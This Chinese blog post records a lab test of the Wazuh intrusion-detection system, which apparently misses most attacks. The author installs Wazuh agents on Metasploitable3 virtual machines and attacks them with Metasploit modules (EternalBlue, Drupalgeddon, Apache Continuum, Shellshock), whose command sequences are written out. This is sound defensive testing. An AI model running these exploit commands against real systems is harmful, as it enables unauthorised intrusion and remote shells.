wazuh的实践

  • A+
所属分类:安全闲碎

很简单,参考官方的安装指南,https://documentation.wazuh.com/current/installation-guide/open-distro/all-in-one-deployment/all_in_one.html,一开始是直接用的一键式安装,安装了两次也没成功,最后还是用一步一步手动安装搞定的,

wazuh的实践

然后就是安装客户端的代理软件,

用的之前实践过的metasploitable3-win2k8.box和metasploitable3-ub1404.box,

windows的下载https://packages.wazuh.com/4.x/windows/wazuh-agent-4.1.5-1.msi,

安装命令,wazuh-agent.msi /q WAZUH_MANAGER=10.90.11.220 WAZUH_REGISTRATION_SERVER=10.90.11.220 WAZUH_AGENT_GROUP=default,

ubuntu的下载https://packages.wazuh.com/4.x/apt/pool/main/w/wazuh-agent/wazuh-agent_4.1.5-1_amd64.deb,

安装命令,sudo WAZUH_MANAGER=10.90.11.220 WAZUH_REGISTRATION_SERVER=10.90.11.220 WAZUH_AGENT_GROUP=default dpkg -i wazuh-agent_4.1.5-1_amd64.deb,

并使能启动,sudo systemctl daemon-reload,

sudo systemctl enable wazuh-agent,

sudo systemctl restart wazuh-agent,

对metasploitable3-win2k8.box做个攻击并获得反弹shell,

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.90.11.244
exploit

wazuh的实践

wazuh的实践

看wazuh那边的反应,看到报了先登录失败然后登录成功的日志,

wazuh的实践

这样的效果并不理想,接着再看linux的,

对metasploitable3-ub1404.box连续做了两个攻击并都获得反弹shell,

use exploit/multi/http/drupal_drupageddon
set RHOSTS 10.90.11.242
set TARGETURI /drupal/
exploit

wazuh的实践

wazuh的实践

use exploit/linux/http/apache_continuum_cmd_exec
set RHOSTS 10.90.11.242
exploit

wazuh的实践

wazuh的实践

wazuh那边都啥反应没有,

后来又做了一个没成功的攻击,

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 10.90.11.242
set TARGETURI /cgi-bin/hello_world.sh
exploit

wazuh的实践

wazuh那边有反应了,

wazuh的实践

总结来说,wazuh在真实的攻击下并不能达到实用的效果,尽管wazuh的日志还匹配了ATT&CK,

wazuh的实践


本文始发于微信公众号(云计算和网络安全技术实践):wazuh的实践

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: